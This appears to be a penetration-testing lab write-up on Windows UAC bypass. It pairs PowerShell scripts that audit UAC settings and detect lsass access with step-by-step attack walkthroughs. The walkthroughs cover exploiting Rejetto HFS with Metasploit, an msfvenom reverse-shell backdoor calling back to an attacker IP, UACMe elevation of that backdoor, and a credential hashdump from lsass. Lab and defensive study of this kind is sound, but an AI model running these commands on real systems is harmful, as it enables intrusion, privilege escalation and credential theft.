
Bypassing UAC


Last updated 3 months ago

User Account Control (UAC) is a Windows security feature introduced in Windows Vista to prevent unauthorized system changes. It ensures that any modification to the operating system requires approval from an administrator or a user with administrative privileges.

  • Non-privileged users who run a program that requires elevated privileges receive a UAC credential prompt.

  • Privileged users see a UAC consent prompt before the action is approved.

Bypassing

To bypass UAC, an attacker needs access to an account on the target system that is a member of the local Administrators group.

  • UAC prompts users before executing programs with administrative rights.

  • UAC is tied to the Windows integrity levels (Low to High): an elevated process runs at High integrity. If the UAC notification level is set below the highest setting, certain Windows programs can elevate without user confirmation.

  • Various tools and techniques can be used to bypass UAC, depending on the Windows version.
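The notification level referred to in the list above is a registry-backed policy, and it is what decides whether Windows' auto-elevate behaviour applies at all. The PowerShell script below is an added example, not code from this page or from the UACMe project: it reads the documented UAC policy values under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, reports the configured admin prompt mode, lists members of the local Administrators group that are not on an allow-list (the allow-list contents are a placeholder assumption), and provides a hardening function that enforces "Always notify". Get-LocalGroupMember assumes Windows 10 / Server 2016 or later.

```powershell
# Added example, not part of the original page or of the UACMe project:
# audit (and optionally harden) the UAC notification level that decides whether
# Microsoft-signed "auto-elevate" binaries may run elevated without a prompt.
# Registry value meanings are Microsoft's documented UAC policy settings.

$UacPolicyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

# Documented meanings of ConsentPromptBehaviorAdmin
$AdminPromptMode = @{
    0 = 'Elevate without prompting'
    1 = 'Prompt for credentials on the secure desktop'
    2 = 'Prompt for consent on the secure desktop'
    3 = 'Prompt for credentials'
    4 = 'Prompt for consent'
    5 = 'Prompt for consent for non-Windows binaries (default)'
}

function Get-UacPosture {
    param([string]$Key = $UacPolicyKey)
    $p = Get-ItemProperty -Path $Key -ErrorAction Stop
    # Absent values fall back to the Windows defaults
    $enableLua    = if ($null -ne $p.EnableLUA) { [int]$p.EnableLUA } else { 1 }
    $adminMode    = if ($null -ne $p.ConsentPromptBehaviorAdmin) { [int]$p.ConsentPromptBehaviorAdmin } else { 5 }
    $secureDesk   = if ($null -ne $p.PromptOnSecureDesktop) { [int]$p.PromptOnSecureDesktop } else { 1 }
    $filterAdmin  = if ($null -ne $p.FilterAdministratorToken) { [int]$p.FilterAdministratorToken } else { 0 }
    $remoteFilter = if ($null -ne $p.LocalAccountTokenFilterPolicy) { [int]$p.LocalAccountTokenFilterPolicy } else { 0 }

    $findings = @()
    if ($enableLua -eq 0) { $findings += 'EnableLUA=0: UAC is disabled; every admin process runs at High integrity.' }
    if ($adminMode -eq 0) { $findings += 'ConsentPromptBehaviorAdmin=0: admins elevate silently; UAC is not a boundary.' }
    elseif ($adminMode -ne 2 -or $secureDesk -ne 1) {
        $findings += "Notification level is below 'Always notify' (mode $adminMode, secure desktop $secureDesk): " +
                     'signed auto-elevate binaries run elevated with no prompt, the condition UAC-bypass tools rely on.'
    }
    if ($filterAdmin -eq 0) { $findings += 'FilterAdministratorToken=0: built-in Administrator is exempt from Admin Approval Mode.' }
    if ($remoteFilter -eq 1) { $findings += 'LocalAccountTokenFilterPolicy=1: local admins receive a full token over the network.' }

    [pscustomobject]@{
        EnableLUA             = $enableLua
        AdminPromptMode       = "$adminMode ($($AdminPromptMode[$adminMode]))"
        PromptOnSecureDesktop = $secureDesk
        AlwaysNotify          = ($enableLua -eq 1 -and $adminMode -eq 2 -and $secureDesk -eq 1)
        Findings              = $findings
    }
}

function Get-UnexpectedLocalAdmins {
    # Constructed allow-list (assumption): replace with the principals that should hold local admin.
    param([string[]]$Expected = @('Administrator', 'Domain Admins'))
    Get-LocalGroupMember -Group 'Administrators' |
        Where-Object { ($_.Name -split '\\')[-1] -notin $Expected } |
        Select-Object Name, ObjectClass, PrincipalSource
}

function Set-UacAlwaysNotify {
    # Hardening: consent on the secure desktop for every elevation; auto-elevate no longer applies.
    # Must run elevated; a change to EnableLUA takes effect after a reboot.
    Set-ItemProperty -Path $UacPolicyKey -Name EnableLUA -Value 1 -Type DWord
    Set-ItemProperty -Path $UacPolicyKey -Name ConsentPromptBehaviorAdmin -Value 2 -Type DWord
    Set-ItemProperty -Path $UacPolicyKey -Name PromptOnSecureDesktop -Value 1 -Type DWord
}

$posture = Get-UacPosture
$posture | Format-List
Get-UnexpectedLocalAdmins | Format-Table -AutoSize
if (-not $posture.AlwaysNotify) { Write-Warning 'Run Set-UacAlwaysNotify (elevated) to close the auto-elevate path.' }
```

The two findings that matter most for this page are AdminPromptMode 5 (the default, which is the level every auto-elevate abuse depends on) and any unexpected member of the local Administrators group, since a bypass needs both: a medium-integrity admin session and a prompt level below "Always notify". Removing either condition removes the technique.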

UACMe

UACMe is a powerful open-source privilege escalation tool. It automates UAC bypass techniques to execute processes with elevated privileges without triggering UAC prompts.

It provides a comprehensive and well-documented list of methods for bypassing UAC across multiple Windows versions, from Windows 7 to Windows 10. By abusing Windows' built-in AutoElevate mechanism, it allows attackers to execute malicious payloads on a target system with administrative or elevated privileges.

## TARGET MACHINE

# Lists all user accounts on the system. This command helps identify available user accounts, including standard and administrator accounts.
net users

# Displays the members of the local Administrators group.
net localgroup administrators

## ATTACKER MACHINE

nmap [TARGET IP]

# w/ Metasploit
msfconsole
setg RHOSTS [TARGET IP]
search rejetto
use exploit/windows/http/rejetto_hfs_exec
show options
exploit

## TARGET MACHINE using meterpreter

# target machine local enumeration
sysinfo
pgrep explorer    # or: ps -S explorer.exe
migrate 2448      # PID of explorer.exe from the previous command
getsystem         # elevation check
getuid
getprivs
shell
net user
net localgroup administrators

## ATTACKER MACHINE

# using UACMe
# Source > Akagi
# Default settings required. Run the executable from the command line:
akagi32 [Key] [Param]
# or
akagi64 [Key] [Param]
# First parameter is the number of the method to use; second is an optional command
# (executable file name including full path) to run. If the second parameter is empty,
# the program executes an elevated cmd.exe from the system32 folder.
# The binary needs to be compiled from source.

# meterpreter payload > upload that to the target > bypass UAC to execute this
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[ATTACKER IP] LPORT=[PORT] -f exe > backdoor.exe

# multi handler setup
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [ATTACKER IP]
set LPORT [PORT]
exploit

## TARGET MACHINE using meterpreter

pwd
getuid
getprivs
cd C:\\
mkdir Temp
cd Temp
upload backdoor.exe
upload Akagi64.exe
Akagi64.exe 23 backdoor.exe    # method 23, runs backdoor.exe elevated

# new meterpreter session with elevated privilege in the handler

I started by gathering basic information on the target machine, listing all user accounts (net users) and identifying members of the Administrators group (net localgroup administrators). Then, from the attacker machine, I scanned the target using Nmap to identify open ports and services.

I leveraged Metasploit to exploit the Rejetto HFS vulnerability, gaining an initial foothold on the target. Once inside, I used Meterpreter to enumerate system details (sysinfo), check running processes (pgrep explorer), migrate to a stable process, and verify privileges.

To escalate privileges, I utilized UACMe, an open-source privilege escalation tool, to bypass User Account Control (UAC). I created a Meterpreter payload using msfvenom, uploaded it to the target machine, and executed it with elevated privileges using UACMe (Akagi64.exe 23 backdoor.exe).

Finally, I set up a multi-handler on Metasploit to catch the reverse shell connection from the backdoor, successfully establishing a new Meterpreter session with elevated privileges on the target.

Memory Injection w/ Metasploit

use exploit/windows/local/bypassuac_injection
set session 1
set TARGET 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

getsystem
getuid

ps -S lsass.exe
migrate 484

hashdump

I used the bypassuac_injection exploit to escalate privileges on a Windows machine. After setting the session and payload, I executed the exploit.

Once inside, I ran getsystem to gain SYSTEM privileges and confirmed my user identity with getuid.

Next, I listed processes searching for lsass.exe and migrated to its PID (484) for stability. Finally, I dumped password hashes using hashdump for credential extraction.
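From the defender's side, both migrating into lsass.exe and running hashdump require opening a handle to lsass.exe with memory-read, memory-write or thread-creation rights, which Sysmon records as Event ID 10 (ProcessAccess). The PowerShell below is an added example, not code from this page or from Metasploit: it runs a detection over three constructed Sysmon Event 10 records (the paths, timestamps and the allow-list of legitimate source images are assumptions) and reports handles whose GrantedAccess includes those rights from an image not on the allow-list, or whose CallTrace passes through memory not backed by any module on disk. A helper shows how to feed it real events from the Sysmon operational log.

```powershell
# Added example, not part of the page or of Metasploit: detect handle opens on lsass.exe
# that carry the rights credential dumping or in-process injection needs, using Sysmon
# Event ID 10 (ProcessAccess) records. Sample records and the allow-list are constructed.

# Win32 process access rights that matter for reading from or tampering with lsass
$PROCESS_CREATE_THREAD = 0x0002
$PROCESS_VM_OPERATION  = 0x0008
$PROCESS_VM_READ       = 0x0010
$PROCESS_VM_WRITE      = 0x0020
$LsassSensitiveBits = $PROCESS_CREATE_THREAD -bor $PROCESS_VM_OPERATION -bor $PROCESS_VM_READ -bor $PROCESS_VM_WRITE

# Constructed allow-list (assumption): images that legitimately touch lsass on this fleet.
$DefaultAllowedSources = @(
    'C:\Windows\System32\csrss.exe',
    'C:\Windows\System32\wininit.exe',
    'C:\Windows\System32\svchost.exe',
    'C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MsMpEng.exe'
)

function Test-LsassAccessRecord {
    param([hashtable]$Record, [string[]]$AllowedSources = $DefaultAllowedSources)
    if ($Record.TargetImage -notmatch '\\lsass\.exe$') { return $null }
    $mask = [int]$Record.GrantedAccess        # Sysmon logs this as a hex string, e.g. 0x1FFFFF
    $reasons = @()
    if ((($mask -band $LsassSensitiveBits) -ne 0) -and ($Record.SourceImage -notin $AllowedSources)) {
        $reasons += ('GrantedAccess 0x{0:X} grants memory read/write or thread creation on lsass' -f $mask)
    }
    # UNKNOWN() frames mean the call came from memory not backed by a module on disk: injected code
    if ($Record.CallTrace -match 'UNKNOWN\(') {
        $reasons += 'call trace passes through unbacked memory'
    }
    if ($reasons.Count -eq 0) { return $null }
    [pscustomobject]@{
        UtcTime = $Record.UtcTime
        Source  = $Record.SourceImage
        Access  = ('0x{0:X}' -f $mask)
        Reasons = ($reasons -join '; ')
    }
}

function Find-LsassAccess {
    param([hashtable[]]$Records, [string[]]$AllowedSources = $DefaultAllowedSources)
    foreach ($r in $Records) {
        $hit = Test-LsassAccessRecord -Record $r -AllowedSources $AllowedSources
        if ($null -ne $hit) { $hit }
    }
}

# Convert real Sysmon events into the hashtable shape used above (needs Sysmon and admin rights)
function Get-SysmonProcessAccessRecords {
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 10 } |
        ForEach-Object {
            $h = @{}
            ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $h[$_.Name] = $_.'#text' }
            $h
        }
}

# Constructed sample records: a benign svchost query, Defender's full-access handle,
# and an unsigned binary in C:\Temp opening lsass with PROCESS_ALL_ACCESS from injected code.
$SampleRecords = @(
    @{ UtcTime = '2025-01-10 09:12:01.101'; SourceImage = 'C:\Windows\System32\svchost.exe'
       TargetImage = 'C:\Windows\System32\lsass.exe'; GrantedAccess = '0x1000'
       CallTrace = 'C:\Windows\SYSTEM32\ntdll.dll+9d4c4|C:\Windows\System32\KERNELBASE.dll+2c5fe' },
    @{ UtcTime = '2025-01-10 09:12:05.420'; SourceImage = 'C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MsMpEng.exe'
       TargetImage = 'C:\Windows\System32\lsass.exe'; GrantedAccess = '0x1FFFFF'
       CallTrace = 'C:\Windows\SYSTEM32\ntdll.dll+9d4c4|C:\Windows\System32\KERNELBASE.dll+2c5fe' },
    @{ UtcTime = '2025-01-10 09:13:44.003'; SourceImage = 'C:\Temp\backdoor.exe'
       TargetImage = 'C:\Windows\System32\lsass.exe'; GrantedAccess = '0x1FFFFF'
       CallTrace = 'C:\Windows\SYSTEM32\ntdll.dll+9d4c4|UNKNOWN(000001E2A0B30000)' }
)

Find-LsassAccess -Records $SampleRecords | Format-Table -AutoSize
```

Two design choices are worth noting. Matching on the individual access bits rather than on a fixed list of masks catches any combination that includes read, write or thread-creation rights, so a tool that requests an unusual mask does not slip past. The allow-list is matched on the full image path, because an attacker-controlled binary named like a system process but living outside System32 should still be reported; pair this with the UAC posture audit earlier on the page, since a host at "Always notify" with no unexpected local admins should produce none of these events outside the allow-list.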

GitHub - hfiref0x/UACME: Defeating Windows User Account Control